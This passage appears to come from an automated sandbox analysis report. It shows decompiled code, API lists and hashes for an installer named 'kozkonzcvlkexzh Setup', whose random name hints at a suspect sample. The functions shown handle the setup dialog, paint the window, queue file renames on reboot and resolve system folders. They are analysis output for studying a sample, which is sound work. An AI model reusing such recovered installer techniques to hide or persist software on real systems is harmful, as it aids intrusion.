                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                • String ID: kozkonzcvlkexzh Setup
                                                • API String ID: 184305955-2504297560
                                                • Opcode ID: de2fcf6cdcd3bcc1c8429ee21d0de177b3c1a35057383903eb5d37bb8d4e0bda
                                                • Instruction ID: 5fd13e9e65c650ae90d185cc2d11acb2e8fe01e0af56b63b73109b0399f4b85d
                                                • Opcode Fuzzy Hash: de2fcf6cdcd3bcc1c8429ee21d0de177b3c1a35057383903eb5d37bb8d4e0bda
                                                • Instruction Fuzzy Hash: EFC1CF71A04201BBDB20AF61ED85D2B7EBCEB4470AB40453EF541B51E1C73DAA429F5E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 93%
                                                			E00403F9C(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                                                				char _v8;
                                                				signed int _v12;
                                                				void* _v16;
                                                				struct HWND__* _t52;
                                                				intOrPtr _t71;
                                                				intOrPtr _t85;
                                                				long _t86;
                                                				int _t98;
                                                				struct HWND__* _t99;
                                                				signed int _t100;
                                                				intOrPtr _t107;
                                                				intOrPtr _t109;
                                                				int _t110;
                                                				signed int* _t112;
                                                				signed int _t113;
                                                				char* _t114;
                                                				CHAR* _t115;
                                                
                                                				if(_a8 != 0x110) {
                                                					if(_a8 != 0x111) {
                                                						L11:
                                                						if(_a8 != 0x4e) {
                                                							if(_a8 == 0x40b) {
                                                								 *0x420518 =  *0x420518 + 1;
                                                							}
                                                							L25:
                                                							_t110 = _a16;
                                                							L26:
                                                							return E00403EBB(_a8, _a12, _t110);
                                                						}
                                                						_t52 = GetDlgItem(_a4, 0x3e8);
                                                						_t110 = _a16;
                                                						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
                                                							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
                                                							_t109 =  *((intOrPtr*)(_t110 + 0x18));
                                                							_v12 = _t100;
                                                							_v16 = _t109;
                                                							_v8 = 0x422ee0;
                                                							if(_t100 - _t109 < 0x800) {
                                                								SendMessageA(_t52, 0x44b, 0,  &_v16);
                                                								SetCursor(LoadCursorA(0, 0x7f02));
                                                								_t40 =  &_v8; // 0x422ee0
                                                								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
                                                								SetCursor(LoadCursorA(0, 0x7f00));
                                                								_t110 = _a16;
                                                							}
                                                						}
                                                						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
                                                							goto L26;
                                                						} else {
                                                							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
                                                								SendMessageA( *0x423f48, 0x111, 1, 0);
                                                							}
                                                							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
                                                								SendMessageA( *0x423f48, 0x10, 0, 0);
                                                							}
                                                							return 1;
                                                						}
                                                					}
                                                					if(_a12 >> 0x10 != 0 ||  *0x420518 != 0) {
                                                						goto L25;
                                                					} else {
                                                						_t112 =  *0x41fd08 + 0x14;
                                                						if(( *_t112 & 0x00000020) == 0) {
                                                							goto L25;
                                                						}
                                                						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                						E00403E76(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                						E00404227();
                                                						goto L11;
                                                					}
                                                				}
                                                				_t98 = _a16;
                                                				_t113 =  *(_t98 + 0x30);
                                                				if(_t113 < 0) {
                                                					_t107 =  *0x42371c; // 0x608bff
                                                					_t113 =  *(_t107 - 4 + _t113 * 4);
                                                				}
                                                				_t71 =  *0x423f78; // 0x607158
                                                				_push( *((intOrPtr*)(_t98 + 0x34)));
                                                				_t114 = _t113 + _t71;
                                                				_push(0x22);
                                                				_a16 =  *_t114;
                                                				_v12 = _v12 & 0x00000000;
                                                				_t115 = _t114 + 1;
                                                				_v16 = _t115;
                                                				_v8 = E00403F68;
                                                				E00403E54(_a4);
                                                				_push( *((intOrPtr*)(_t98 + 0x38)));
                                                				_push(0x23);
                                                				E00403E54(_a4);
                                                				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                				E00403E76( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                                                				_t99 = GetDlgItem(_a4, 0x3e8);
                                                				E00403E89(_t99);
                                                				SendMessageA(_t99, 0x45b, 1, 0);
                                                				_t85 =  *0x423f50; // 0x601fd8
                                                				_t86 =  *(_t85 + 0x68);
                                                				if(_t86 < 0) {
                                                					_t86 = GetSysColor( ~_t86);
                                                				}
                                                				SendMessageA(_t99, 0x443, 0, _t86);
                                                				SendMessageA(_t99, 0x445, 0, 0x4010000);
                                                				 *0x41f4fc =  *0x41f4fc & 0x00000000;
                                                				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
                                                				SendMessageA(_t99, 0x449, _a16,  &_v16);
                                                				 *0x420518 =  *0x420518 & 0x00000000;
                                                				return 0;
                                                			}





















                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                • String ID: N$open$.B
                                                • API String ID: 3615053054-720656042
                                                • Opcode ID: 1798247d7b7fc50258c29a0d8842d8596947dcfb78ae24f73fc7e5e40567b794
                                                • Instruction ID: d52f05746bbb3f3b1d606d9c91532631e65720296560e4ea5c31ec00add49965
                                                • Opcode Fuzzy Hash: 1798247d7b7fc50258c29a0d8842d8596947dcfb78ae24f73fc7e5e40567b794
                                                • Instruction Fuzzy Hash: 0161D571A40309BBEB109F60DD45F6A7B69FB54715F108036FB04BA2D1C7B8AA51CF98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.497246318.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000004.00000002.497232899.0000000010000000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.497307012.0000000010014000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.497331845.000000001001A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.497358884.000000001001F000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: File$ErrorLast$View$CloseCreateHandleMappingSize$PointerUnmap
                                                • String ID:
                                                • API String ID: 2750380209-0
                                                • Opcode ID: 938e871ca43ba9d6f85a09dcb3d126173da7e9b71146e472b66c4393e983a2c6
                                                • Instruction ID: 246f83eb046c6acef81ee336314e226087782afd8f3c94662116537e38e35e4e
                                                • Opcode Fuzzy Hash: 938e871ca43ba9d6f85a09dcb3d126173da7e9b71146e472b66c4393e983a2c6
                                                • Instruction Fuzzy Hash: 8CE17DB49087818FE760DF28C58875BBBE4FB88354F108A2EE89987394D7759548CF93
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 90%
                                                			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                				struct tagLOGBRUSH _v16;
                                                				struct tagRECT _v32;
                                                				struct tagPAINTSTRUCT _v96;
                                                				struct HDC__* _t70;
                                                				struct HBRUSH__* _t87;
                                                				struct HFONT__* _t94;
                                                				long _t102;
                                                				intOrPtr _t115;
                                                				signed int _t126;
                                                				struct HDC__* _t128;
                                                				intOrPtr _t130;
                                                
                                                				if(_a8 == 0xf) {
                                                					_t130 =  *0x423f50; // 0x601fd8
                                                					_t70 = BeginPaint(_a4,  &_v96);
                                                					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                					_a8 = _t70;
                                                					GetClientRect(_a4,  &_v32);
                                                					_t126 = _v32.bottom;
                                                					_v32.bottom = _v32.bottom & 0x00000000;
                                                					while(_v32.top < _t126) {
                                                						_a12 = _t126 - _v32.top;
                                                						asm("cdq");
                                                						asm("cdq");
                                                						asm("cdq");
                                                						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                						_t87 = CreateBrushIndirect( &_v16);
                                                						_v32.bottom = _v32.bottom + 4;
                                                						_a16 = _t87;
                                                						FillRect(_a8,  &_v32, _t87);
                                                						DeleteObject(_a16);
                                                						_v32.top = _v32.top + 4;
                                                					}
                                                					if( *(_t130 + 0x58) != 0xffffffff) {
                                                						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                                                						_a16 = _t94;
                                                						if(_t94 != 0) {
                                                							_t128 = _a8;
                                                							_v32.left = 0x10;
                                                							_v32.top = 8;
                                                							SetBkMode(_t128, 1);
                                                							SetTextColor(_t128,  *(_t130 + 0x58));
                                                							_a8 = SelectObject(_t128, _a16);
                                                							DrawTextA(_t128, "kozkonzcvlkexzh Setup", 0xffffffff,  &_v32, 0x820);
                                                							SelectObject(_t128, _a8);
                                                							DeleteObject(_a16);
                                                						}
                                                					}
                                                					EndPaint(_a4,  &_v96);
                                                					return 0;
                                                				}
                                                				_t102 = _a16;
                                                				if(_a8 == 0x46) {
                                                					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                					_t115 =  *0x423f48; // 0x50378
                                                					 *((intOrPtr*)(_t102 + 4)) = _t115;
                                                				}
                                                				return DefWindowProcA(_a4, _a8, _a12, _t102);
                                                			}















                                                APIs
                                                • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                • GetClientRect.USER32 ref: 0040105B
                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                • SetTextColor.GDI32(00000000,?), ref: 00401130
                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                • DrawTextA.USER32(00000000,kozkonzcvlkexzh Setup,000000FF,00000010,00000820), ref: 00401156
                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                • DeleteObject.GDI32(?), ref: 00401165
                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                • String ID: F$kozkonzcvlkexzh Setup
                                                • API String ID: 941294808-2598242078
                                                • Opcode ID: cae46454919e7fa79772e51e967b3c1ae0100adcfe078b8b521791772386bd0b
                                                • Instruction ID: 81ce27436f0092abe3ce3185f2c65b9207eacd25275343976a1476a18aae1cf1
                                                • Opcode Fuzzy Hash: cae46454919e7fa79772e51e967b3c1ae0100adcfe078b8b521791772386bd0b
                                                • Instruction Fuzzy Hash: 06418B71804249AFCB058F95DD459AFBBB9FF44315F00802AF961AA2A0C738EA51DFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 93%
                                                			E004058E6(void* __eflags) {
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				intOrPtr* _t15;
                                                				long _t16;
                                                				intOrPtr _t18;
                                                				int _t20;
                                                				void* _t28;
                                                				long _t29;
                                                				intOrPtr* _t37;
                                                				int _t43;
                                                				void* _t44;
                                                				long _t47;
                                                				CHAR* _t49;
                                                				void* _t51;
                                                				void* _t53;
                                                				intOrPtr* _t54;
                                                				void* _t55;
                                                				void* _t56;
                                                
                                                				_t15 = E00405F28(2);
                                                				_t49 =  *(_t55 + 0x18);
                                                				if(_t15 != 0) {
                                                					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
                                                					if(_t20 != 0) {
                                                						L16:
                                                						 *0x423fd0 =  *0x423fd0 + 1;
                                                						return _t20;
                                                					}
                                                				}
                                                				 *0x4226c8 = 0x4c554e;
                                                				if(_t49 == 0) {
                                                					L5:
                                                					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x422140, 0x400);
                                                					if(_t16 != 0 && _t16 <= 0x400) {
                                                						_t43 = wsprintfA(0x421d40, "%s=%s\r\n", 0x4226c8, 0x422140);
                                                						_t18 =  *0x423f50; // 0x601fd8
                                                						_t56 = _t55 + 0x10;
                                                						E00405BBA(_t43, 0x400, 0x422140, 0x422140,  *((intOrPtr*)(_t18 + 0x128)));
                                                						_t20 = E0040586F(0x422140, 0xc0000000, 4);
                                                						_t53 = _t20;
                                                						 *(_t56 + 0x14) = _t53;
                                                						if(_t53 == 0xffffffff) {
                                                							goto L16;
                                                						}
                                                						_t47 = GetFileSize(_t53, 0);
                                                						_t7 = _t43 + 0xa; // 0xa
                                                						_t51 = GlobalAlloc(0x40, _t47 + _t7);
                                                						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
                                                							L15:
                                                							_t20 = CloseHandle(_t53);
                                                							goto L16;
                                                						} else {
                                                							if(E004057E4(_t51, "[Rename]\r\n") != 0) {
                                                								_t28 = E004057E4(_t26 + 0xa, 0x4093e4);
                                                								if(_t28 == 0) {
                                                									L13:
                                                									_t29 = _t47;
                                                									L14:
                                                									E00405830(_t51 + _t29, 0x421d40, _t43);
                                                									SetFilePointer(_t53, 0, 0, 0);
                                                									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
                                                									GlobalFree(_t51);
                                                									goto L15;
                                                								}
                                                								_t37 = _t28 + 1;
                                                								_t44 = _t51 + _t47;
                                                								_t54 = _t37;
                                                								if(_t37 >= _t44) {
                                                									L21:
                                                									_t53 =  *(_t56 + 0x14);
                                                									_t29 = _t37 - _t51;
                                                									goto L14;
                                                								} else {
                                                									goto L20;
                                                								}
                                                								do {
                                                									L20:
                                                									 *((char*)(_t43 + _t54)) =  *_t54;
                                                									_t54 = _t54 + 1;
                                                								} while (_t54 < _t44);
                                                								goto L21;
                                                							}
                                                							E00405B98(_t51 + _t47, "[Rename]\r\n");
                                                							_t47 = _t47 + 0xa;
                                                							goto L13;
                                                						}
                                                					}
                                                				} else {
                                                					CloseHandle(E0040586F(_t49, 0, 1));
                                                					_t16 = GetShortPathNameA(_t49, 0x4226c8, 0x400);
                                                					if(_t16 != 0 && _t16 <= 0x400) {
                                                						goto L5;
                                                					}
                                                				}
                                                				return _t16;
                                                			}























                                                APIs
                                                  • Part of subcall function 00405F28: GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                                  • Part of subcall function 00405F28: GetProcAddress.KERNEL32(00000000,?,?,?,00403165,0000000D), ref: 00405F55
                                                • CloseHandle.KERNEL32(00000000), ref: 00405933
                                                • GetShortPathNameA.KERNEL32 ref: 0040593C
                                                • GetShortPathNameA.KERNEL32 ref: 00405959
                                                • wsprintfA.USER32 ref: 00405977
                                                • GetFileSize.KERNEL32(00000000,00000000,00422140,C0000000,00000004,00422140,?,?,?,00000000,000000F1,?), ref: 004059B2
                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004059C1
                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004059D7
                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421D40,00000000,-0000000A,004093E4,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405A1D
                                                • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00405A2F
                                                • GlobalFree.KERNEL32(00000000), ref: 00405A36
                                                • CloseHandle.KERNEL32(00000000), ref: 00405A3D
                                                  • Part of subcall function 004057E4: lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057EB
                                                  • Part of subcall function 004057E4: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeModulePointerProcReadSizeWritewsprintf
                                                • String ID: %s=%s$@!B$[Rename]
                                                • API String ID: 3445103937-2946522640
                                                • Opcode ID: ba6dd0a96c47d1f42225f0131925257862b6081e9796f2b12c44a8ffad6b8124
                                                • Instruction ID: 3fdb6a032fd62a2424e34f1ba2115feadd67922d203a780a084708b988c1bb31
                                                • Opcode Fuzzy Hash: ba6dd0a96c47d1f42225f0131925257862b6081e9796f2b12c44a8ffad6b8124
                                                • Instruction Fuzzy Hash: C8410231B01B167BD7206B619D89F6B3A5CEF44755F04013AFD05F62D2E67CA8008EAD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 74%
                                                			E00405BBA(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                                                				signed int _v8;
                                                				struct _ITEMIDLIST* _v12;
                                                				signed int _v16;
                                                				signed char _v20;
                                                				signed int _v24;
                                                				signed char _v28;
                                                				signed int _t36;
                                                				CHAR* _t37;
                                                				signed int _t39;
                                                				int _t40;
                                                				char _t50;
                                                				char _t51;
                                                				char _t53;
                                                				char _t55;
                                                				void* _t63;
                                                				signed int _t69;
                                                				intOrPtr _t73;
                                                				signed int _t74;
                                                				signed int _t75;
                                                				intOrPtr _t79;
                                                				char _t83;
                                                				void* _t85;
                                                				CHAR* _t86;
                                                				void* _t88;
                                                				signed int _t95;
                                                				signed int _t97;
                                                				void* _t98;
                                                
                                                				_t88 = __esi;
                                                				_t85 = __edi;
                                                				_t63 = __ebx;
                                                				_t36 = _a8;
                                                				if(_t36 < 0) {
                                                					_t79 =  *0x42371c; // 0x608bff
                                                					_t36 =  *(_t79 - 4 + _t36 * 4);
                                                				}
                                                				_t73 =  *0x423f78; // 0x607158
                                                				_t74 = _t73 + _t36;
                                                				_t37 = 0x422ee0;
                                                				_push(_t63);
                                                				_push(_t88);
                                                				_push(_t85);
                                                				_t86 = 0x422ee0;
                                                				if(_a4 - 0x422ee0 < 0x800) {
                                                					_t86 = _a4;
                                                					_a4 = _a4 & 0x00000000;
                                                				}
                                                				while(1) {
                                                					_t83 =  *_t74;
                                                					if(_t83 == 0) {
                                                						break;
                                                					}
                                                					__eflags = _t86 - _t37 - 0x400;
                                                					if(_t86 - _t37 >= 0x400) {
                                                						break;
                                                					}
                                                					_t74 = _t74 + 1;
                                                					__eflags = _t83 - 0xfc;
                                                					_a8 = _t74;
                                                					if(__eflags <= 0) {
                                                						if(__eflags != 0) {
                                                							 *_t86 = _t83;
                                                							_t86 =  &(_t86[1]);
                                                							__eflags = _t86;
                                                						} else {
                                                							 *_t86 =  *_t74;
                                                							_t86 =  &(_t86[1]);
                                                							_t74 = _t74 + 1;
                                                						}
                                                						continue;
                                                					}
                                                					_t39 =  *(_t74 + 1);
                                                					_t75 =  *_t74;
                                                					_t95 = (_t39 & 0x0000007f) << 0x00000007 | _t75 & 0x0000007f;
                                                					_a8 = _a8 + 2;
                                                					_v28 = _t75 | 0x00000080;
                                                					_t69 = _t75;
                                                					_v24 = _t69;
                                                					__eflags = _t83 - 0xfe;
                                                					_v20 = _t39 | 0x00000080;
                                                					_v16 = _t39;
                                                					if(_t83 != 0xfe) {
                                                						__eflags = _t83 - 0xfd;
                                                						if(_t83 != 0xfd) {
                                                							__eflags = _t83 - 0xff;
                                                							if(_t83 == 0xff) {
                                                								__eflags = (_t39 | 0xffffffff) - _t95;
                                                								E00405BBA(_t69, _t86, _t95, _t86, (_t39 | 0xffffffff) - _t95);
                                                							}
                                                							L41:
                                                							_t40 = lstrlenA(_t86);
                                                							_t74 = _a8;
                                                							_t86 =  &(_t86[_t40]);
                                                							_t37 = 0x422ee0;
                                                							continue;
                                                						}
                                                						__eflags = _t95 - 0x1d;
                                                						if(_t95 != 0x1d) {
                                                							__eflags = (_t95 << 0xa) + 0x425000;
                                                							E00405B98(_t86, (_t95 << 0xa) + 0x425000);
                                                						} else {
                                                							E00405AF6(_t86,  *0x423f48);
                                                						}
                                                						__eflags = _t95 + 0xffffffeb - 7;
                                                						if(_t95 + 0xffffffeb < 7) {
                                                							L32:
                                                							E00405DFA(_t86);
                                                						}
                                                						goto L41;
                                                					}
                                                					_t97 = 2;
                                                					_t50 = GetVersion();
                                                					__eflags = _t50;
                                                					if(_t50 >= 0) {
                                                						L12:
                                                						_v8 = 1;
                                                						L13:
                                                						__eflags =  *0x423fc4;
                                                						if( *0x423fc4 != 0) {
                                                							_t97 = 4;
                                                						}
                                                						__eflags = _t69;
                                                						if(_t69 >= 0) {
                                                							__eflags = _t69 - 0x25;
                                                							if(_t69 != 0x25) {
                                                								__eflags = _t69 - 0x24;
                                                								if(_t69 == 0x24) {
                                                									GetWindowsDirectoryA(_t86, 0x400);
                                                									_t97 = 0;
                                                								}
                                                								while(1) {
                                                									__eflags = _t97;
                                                									if(_t97 == 0) {
                                                										goto L29;
                                                									}
                                                									_t51 =  *0x423f44; // 0x74631528
                                                									_t97 = _t97 - 1;
                                                									__eflags = _t51;
                                                									if(_t51 == 0) {
                                                										L25:
                                                										_t53 = SHGetSpecialFolderLocation( *0x423f48,  *(_t98 + _t97 * 4 - 0x18),  &_v12);
                                                										__eflags = _t53;
                                                										if(_t53 != 0) {
                                                											L27:
                                                											 *_t86 =  *_t86 & 0x00000000;
                                                											__eflags =  *_t86;
                                                											continue;
                                                										}
                                                										__imp__SHGetPathFromIDListA(_v12, _t86);
                                                										__imp__CoTaskMemFree(_v12);
                                                										__eflags = _t53;
                                                										if(_t53 != 0) {
                                                											goto L29;
                                                										}
                                                										goto L27;
                                                									}
                                                									__eflags = _v8;
                                                									if(_v8 == 0) {
                                                										goto L25;
                                                									}
                                                									_t55 =  *_t51( *0x423f48,  *(_t98 + _t97 * 4 - 0x18), 0, 0, _t86);
                                                									__eflags = _t55;
                                                									if(_t55 == 0) {
                                                										goto L29;
                                                									}
                                                									goto L25;
                                                								}
                                                								goto L29;
                                                							}
                                                							GetSystemDirectoryA(_t86, 0x400);
                                                							goto L29;
                                                						} else {
                                                							_t72 = (_t69 & 0x0000003f) +  *0x423f78;
                                                							E00405A7F(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t69 & 0x0000003f) +  *0x423f78, _t86, _t69 & 0x00000040);
                                                							__eflags =  *_t86;
                                                							if( *_t86 != 0) {
                                                								L30:
                                                								__eflags = _v16 - 0x1a;
                                                								if(_v16 == 0x1a) {
                                                									lstrcatA(_t86, "\\Microsoft\\Internet Explorer\\Quick Launch");
                                                								}
                                                								goto L32;
                                                							}
                                                							E00405BBA(_t72, _t86, _t97, _t86, _v16);
                                                							L29:
                                                							__eflags =  *_t86;
                                                							if( *_t86 == 0) {
                                                								goto L32;
                                                							}
                                                							goto L30;
                                                						}
                                                					}
                                                					__eflags = _t50 - 0x5a04;
                                                					if(_t50 == 0x5a04) {
                                                						goto L12;
                                                					}
                                                					__eflags = _v16 - 0x23;
                                                					if(_v16 == 0x23) {
                                                						goto L12;
                                                					}
                                                					__eflags = _v16 - 0x2e;
                                                					if(_v16 == 0x2e) {
                                                						goto L12;
                                                					} else {
                                                						_v8 = _v8 & 0x00000000;
                                                						goto L13;
                                                					}
                                                				}
                                                				 *_t86 =  *_t86 & 0x00000000;
                                                				if(_a4 == 0) {
                                                					return _t37;
                                                				}
                                                				return E00405B98(_a4, _t37);
                                                			}


                                                APIs
                                                • GetVersion.KERNEL32(00000000,0041FD10,00000000,00404EBC,0041FD10,00000000), ref: 00405C62
                                                • GetSystemDirectoryA.KERNEL32(pnzipglt,00000400), ref: 00405CDD
                                                • GetWindowsDirectoryA.KERNEL32(pnzipglt,00000400), ref: 00405CF0
                                                • SHGetSpecialFolderLocation.SHELL32(?,0040F0E0), ref: 00405D2C
                                                • SHGetPathFromIDListA.SHELL32(0040F0E0,pnzipglt), ref: 00405D3A
                                                • CoTaskMemFree.OLE32(0040F0E0), ref: 00405D45
                                                • lstrcatA.KERNEL32(pnzipglt,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D67
                                                • lstrlenA.KERNEL32(pnzipglt,00000000,0041FD10,00000000,00404EBC,0041FD10,00000000), ref: 00405DB9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$pnzipglt
                                                • API String ID: 900638850-3776897928
                                                • Opcode ID: 722f7ba73d7118e4ab3b6bf0c831072dc3c77b8f74574a686c3719bf3172466b
                                                • Instruction ID: c09fc2b2839bb59ef3d9b0e1161cb0e194e2e056f91f07e7f33828596fbb00b3
                                                • Opcode Fuzzy Hash: 722f7ba73d7118e4ab3b6bf0c831072dc3c77b8f74574a686c3719bf3172466b
                                                • Instruction Fuzzy Hash: CE51F331A04A05AAEF215F648C88BBF3B74EF05714F10827BE911B62E0D27C5942DF5E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.497246318.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000004.00000002.497232899.0000000010000000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.497307012.0000000010014000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.497331845.000000001001A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.497358884.000000001001F000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: CreateErrorFileLast$CloseHandle
                                                • String ID:
                                                • API String ID: 3924142190-0
                                                • Opcode ID: d12f181800eb8c19918e4139051a8d3be48e902166dd29db6573b9f49fbd6db8
                                                • Instruction ID: b2d0b2de5821d68271a41f9e2dfa233027f279bb11c678953abce689e22d6745
                                                • Opcode Fuzzy Hash: d12f181800eb8c19918e4139051a8d3be48e902166dd29db6573b9f49fbd6db8
                                                • Instruction Fuzzy Hash: AF71A0B490435A8FEB00DFA8C58879EBBF0FB48354F10892EE855A7384D7759A44CF92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.497246318.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000004.00000002.497232899.0000000010000000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.497307012.0000000010014000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.497331845.000000001001A000.00000004.00020000.sdmp
